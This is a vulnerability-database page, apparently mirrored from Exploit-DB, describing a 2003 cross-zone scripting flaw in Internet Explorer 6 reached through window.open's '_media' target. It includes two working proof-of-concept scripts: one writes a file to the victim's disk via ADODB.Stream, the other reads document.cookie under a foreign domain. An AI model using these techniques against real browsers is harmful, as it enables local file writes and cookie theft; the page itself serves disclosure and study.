Microsoft Internet Explorer 6 – window.open Media Bar Cross-Zone Scripting

Microsoft Internet Explorer 6 – window.open Media Bar Cross-Zone Scripting

漏洞ID 1054160 漏洞类型
发布时间 2003-09-11 更新时间 2003-09-11
图片[1]-Microsoft Internet Explorer 6 – window.open Media Bar Cross-Zone Scripting-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 6 – window.open Media Bar Cross-Zone Scripting-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23768
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9769/info

It has been reported that Microsoft Internet Explorer may be prone to a cross-zone scripting vulnerability that could ultimately lead to execution of malicious script code and Active Content in the context of the My Computer Zone or a foreign domain. Reportedly, hostile code can be executed in the context of the Media Bar via the '_media' property of the 'window.open' method. Cross-Site scripting attacks are possible as well. This functionality is only available in Internet Explorer 6 and above.

This issue was originally described in BID 8577 "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities". 

<script>

// '\42' -> '42' -> ' " '
img_src='javascript:file = \42Exploit.txt\42; o = new ActiveXObject(\42ADODB.Stream\42);'
+ ' o.Open(); o.Type=2; o.Charset=\42ascii\42; o.WriteText(\42My name is Cheng Peng Su.\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\42I wanna create \42+file+\42 on your desktop!\42);';

inject_html="<img src='" + img_src + "'>";

window.open('file:javascript:document.write("' + inject_html + '")','_media');

</script>

Additional proof of concept for cross site scripting has been supplied as well:

<script>

window.open("http://www.google.com/","_media")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_media")
},5000);

</script>

相关推荐: Erwin Lansing mailidx Input Validation Vulnerability

Erwin Lansing mailidx Input Validation Vulnerability 漏洞ID 1102609 漏洞类型 Input Validation Error 发布时间 2002-01-04 更新时间 2002-01-04 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享